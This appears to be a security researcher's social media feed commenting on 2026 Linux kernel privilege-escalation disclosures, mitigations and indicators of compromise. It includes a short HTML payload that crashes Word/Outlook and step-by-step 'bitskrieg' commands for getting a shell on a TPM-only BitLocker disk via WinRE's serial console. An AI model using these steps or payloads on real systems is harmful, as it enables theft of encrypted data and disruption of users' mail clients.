Posts by wdormann@infosec.exchange
(DIR) Post #B5mIdphyhopfDNlT1s by wdormann@infosec.exchange
2026-04-28T19:13:32Z
0 likes, 0 repeats
@dead_man Yeah, the irony here is that my 9-year-old Pixel 2 had a more current patch level than my new-from-carrier S26.
(DIR) Post #B5p5ykKHCE1MfoCSSe by wdormann@infosec.exchange
2026-04-29T18:37:29Z
0 likes, 0 repeats
So CopyFail CVE-2026-31431 is a thing.If you're on the Ubuntu platform, 26.04 is not affected. 18.04 through 25.10 are indeed affected, but no fixes are available.If you're on another platform, check with your vendor for update availability.
(DIR) Post #B5p5ylOZDl2zzPDOmu by wdormann@infosec.exchange
2026-04-29T18:55:18Z
0 likes, 0 repeats
If you're using an obscure distro like "Debian", you may not have a fix available.
(DIR) Post #B5p5ymMTd0yAzDFFAW by wdormann@infosec.exchange
2026-04-29T20:28:39Z
0 likes, 0 repeats
Or RHEL.I suspect that some people use that?
(DIR) Post #B5p5ynE0PzmtfEHzbU by wdormann@infosec.exchange
2026-04-30T12:46:21Z
1 likes, 1 repeats
While this vulnerability seems to be discovered using AI ("Xint Code"), I have to assume that they also let the AI decide how to do the vulnerability coordination as well.major builds are out as of this writing ๐No distros have official updates for CVE-2026-31431. Fedora 42 and newer have updates, but no official advisory or acknowledgement of CVE-2026-31431. So with them it's unclear if it's even intentional. Red Hat, Ubuntu, Amazon Linux, and Suse all have advisories as of now, but NO updates.disable the algif_aead module as a mitigation. ๐Bespoke distros like RHEL don't use a module, it's compiled into the kernel.I can't figure out what the Xint Code angle is with this copyfail stuff. On one hand, yes, it is a true vulnerability that affects a LOT of Linux distros available. And they did submit the bug for fixing to the upstream kernel people.BUT the CVE has only existed for a week. And NONE of the distros IN THEIR ADVISORY had updates available at the time that they pulled the trigger for publication of the shiny copy.fail website.I struggle to think of how this even happens. In all my years of infosec, you're either on board with doing CVD (e.g. coordinating with the former CERT/CC) or you're not (dropping 0day). But this all fits bizarrely in the middle. The publication gives the guise that they did the right thing, (and please use our AI services). But at the same time, they clearly chose to release the vulnerability details and functional exploit before any distro had the ability to properly do anything about it.Either these Xint Code people have a hidden agenda or ulterior motive that we aren't aware of yet. Or they're just really bad at coordinated vulnerability disclosure. You pick.
(DIR) Post #B5p5yrv2xuaqDsSQFM by wdormann@infosec.exchange
2026-04-30T13:38:34Z
0 likes, 0 repeats
If you're curious about IOCs for copyfail, look in syslog for:NET: Registered PF_ALG protocol familyfor attempts to exploit copyfail on systems that use the vulnerable code as a module. For systems that have the vulnerable code compiled into the kernel, like RHEL, you'll see this line on every boot.And at least for this particular flavor of exploit, a wall-clock nearby:process 'su' launched '/bin/sh with NULL argv: empty string added`is an indication of successful exploitation.But it's worth noting that the "process launched" stuff is merely what the ITW PoC will leave behind. More clever exploitation may not be as obvious.
(DIR) Post #B5q3N1LnRghDifkpSC by wdormann@infosec.exchange
2026-04-30T18:37:32Z
1 likes, 0 repeats
What went wrong with this case?Theori appear to have only contacted the linux kernel devs with the vulnerability, as opposed to going the usual CVD route that includes all of the major Linux distros.Why is this a problem? Since the linux kernel became a CNA, there has been a flood of CVEs for the Linux kernel. The Linux kernel devs' arguments is that any given kernel flaw could presumably be leveraged to behave as a vulnerability, and it's not worth their time to determine "vulnerability" or "not a vulnerability". Everything gets a CVE.Now the case with copy.fail? It was indeed reported to the kernel devs. And it got a CVE. A single CVE buried in flood of all of the Linux kernel CVEs.And it appears that every distro on the planet was blindsided by this proven-exploitable vulnerability because they were not given any warning. Or even any suggestion to pick this single CVE out of the sea of Linux kernel CVEs as worth cherry picking.Much to the chagrin of the Linux devs, RHEL doesn't use up-to-date Linux kernels. They cherry pick CVEs to backport to their chosen kernel version. (e.g. the latest and greates RHEL 10.1 uses 6.12.0, which was released November 17 2024). And in this world where bad actors like Theori don't involve vendors in vulnerability coordination, and just about every Linux kernel bug gets a CVE, this workflow fails. Hard.Good times...
(DIR) Post #B5q3N6QaZIV5Sz2E7M by wdormann@infosec.exchange
2026-04-30T22:49:41Z
0 likes, 0 repeats
Unlike what the buffoons at Theori published as a "mitigation", the folks at Red Hat actually published a viable mitigation for CopyFail CVE-2026-31431.Specifically, edit your grub (or whatever you use to load your kernel) configuration to have one of the following arguments:initcall_blacklist=algif_aead_initinitcall_blacklist=af_alg_initinitcall_blacklist=crypto_authenc_esn_module_initWith such boot arguments to the Linux kernel, the affected bits won't be reachable.
(DIR) Post #B5qfs42TITSvIBwdxw by wdormann@infosec.exchange
2026-04-30T19:03:02Z
1 likes, 0 repeats
@k8ie Yes, it's clear that it was published as a "Look at us!" vehicle.But their abysmally bad coordination put every Linux user on the planet at risk, and is clear evidence that they don't care about anybody other than themselves.
(DIR) Post #B5rP2JkMFKZ6qIjffs by wdormann@infosec.exchange
2026-05-01T02:01:08Z
0 likes, 0 repeats
@joshbressers @Viss If only there were human beings out there who had any sort of experience with coordinating vulnerabilities... ๐
(DIR) Post #B670TWpCLE7KthEkQS by wdormann@infosec.exchange
2026-05-08T03:31:00Z
0 likes, 0 repeats
The 3 recent Linux LPEs are sort of interesting in that each one took a different path from discovery to disclosure.Copy Fail: Publicity stunt where they claim to have done the right thing, yet didn't bother to tell a single distro vendor, and lied about updates being available.Dirty Frag: Attempted to do proper coordination, including notifying the linux-distros mailing list. But the embargo was broken, so it was disclosed unexpectedly ahead of time.Copy Fail 2: Discovered as an n-day by looking at kernel commit logs and Spender noticing that it was copyfail-classEach path had basically exactly the same outcome (No fixes at publication time). ๐
(DIR) Post #B670TYXBz8u2CQpOdc by wdormann@infosec.exchange
2026-05-08T12:51:40Z
0 likes, 1 repeats
And just to clarify about "Dirty Frag" vs. "Copy Fail 2":Dirty Frag is TWO vulnerabilities:The xfrm-ESP Page-Cache Write vulnerability has been assigned CVE-2026-43284 and patched in mainline at f4c50a4034e6.The RxRPC Page-Cache Write vulnerability has been reserved as CVE-2026-43500 for tracking; no patch exists in any tree yet.Copy Fail 2 is a "clean room" rediscovery/exploitation of f4c50a4034e6 (CVE-2026-43284)Since Copy Fail 2 was published to GitHub 1 hour earlier than Dirty Frag was published. The Dirty Frag writeup specifies that the embargo was broken, and as a result TWO vulnerabilities were disclosed.Personally, I think that if you publish a patch for a vulnerability, and then you begin an embargo a week after it was published, that doesn't really count as an "embargo"? ๐คทโโ๏ธFun stuff...
(DIR) Post #B69xCPo5SofZovkGVU by wdormann@infosec.exchange
2026-05-10T13:47:38Z
1 likes, 0 repeats
Remember the early days of Uber and Lyft, when rides were dirt cheap because the companies were operating at a loss in order to capture the minds/wallets of the masses?The rug pull in the AI/LLM world when the companies adjust pricing to actually make a profit is going to be spectacular. Especially when you consider the numbers of people / orgs that are addicted to or dependent on such technology.
(DIR) Post #B6OLiapSSWTfIS5yb2 by wdormann@infosec.exchange
2026-05-15T04:23:43Z
1 likes, 1 repeats
Stolen from the bad site:GNU people:ls is more than enough characters.Powershell people:How about Remove-MgIdentityAuthenticationEventFlowAsOnGraphAPretributeCollectionExternalUserSelfServiceSignUpAttributeIdentityUserFlowAttributeByRef ?
(DIR) Post #B6kpZeS870qH42Ip3g by wdormann@infosec.exchange
2026-05-27T17:59:15Z
1 likes, 0 repeats
Neat.An unprivileged user can crash Windows if it has a USB printer driver loaded.No CVE because it doesn't meet MSRC's bar for servicing.
(DIR) Post #B6xDH9i6OzutIp0RBw by wdormann@infosec.exchange
2026-05-30T13:56:42Z
0 likes, 0 repeats
LOL. From over at the bad site:An html email will crash Outlook.Granted, it's "harmless" (stack overflow (exhaustion)), but I dunno... I sort of expect the act of rendering an HTML email that uses CSS to not crash my mail client?
(DIR) Post #B6xDHAiqdi6iRQMXzc by wdormann@infosec.exchange
2026-05-30T14:13:22Z
1 likes, 0 repeats
I'm no expert, but I get the impression that Microsoft Word is perhaps not the best choice for rendering HTML content.But what else is Outlook supposed to use to render HTML emails? ๐
(DIR) Post #B6xDHFS13ic96fWfx2 by wdormann@infosec.exchange
2026-05-30T16:38:34Z
1 likes, 0 repeats
If you want a more minimal HTML sample that will crash Word/Outlook, this will still do it:<html><table><div style="mso-element:field-begin" /><table><div style="mso-element:field-begin;">listnum</div><div style="mso-element:field-end;" /></table></table></html>
(DIR) Post #B72A82kFbMRd1Om2ee by wdormann@infosec.exchange
2026-06-05T20:19:26Z
2 likes, 1 repeats
Well, bitskrieg is public.While Microsoft "fixed" YellowKey as CVE-2026-45585 (and by "fixed", I mean they have provided manual steps that you can perform if you want to remove autofstx.exe from the WinRE registry BootExecute value), bitskrieg still works on such a system to achieve the same goal. Though it requires a second computer, or a device that can communicate on a serial port.Boot into WinReGo to a command prompt, ignoring the prompt to enter a bitlocker recovery key. (Click Skip this drive)Enable the serial port in WinRe:bcdedit /set ems 1bcdedit /set emsport 1Reboot back into WinReFrom your other computer, connect to the serial port.Type:cmdesctab-Enjoy your cmd.exe prompt (over serial) with a decrypted (assuming it's TPM-only) hard disk.
(DIR) Post #B78CzNTUcp2TWCFqqG by wdormann@infosec.exchange
2026-06-08T17:54:07Z
1 likes, 0 repeats
TIL that titanium cutting boards are a thing.Who is the target audience for such things? Families with little kids, where sharp things are to be avoided?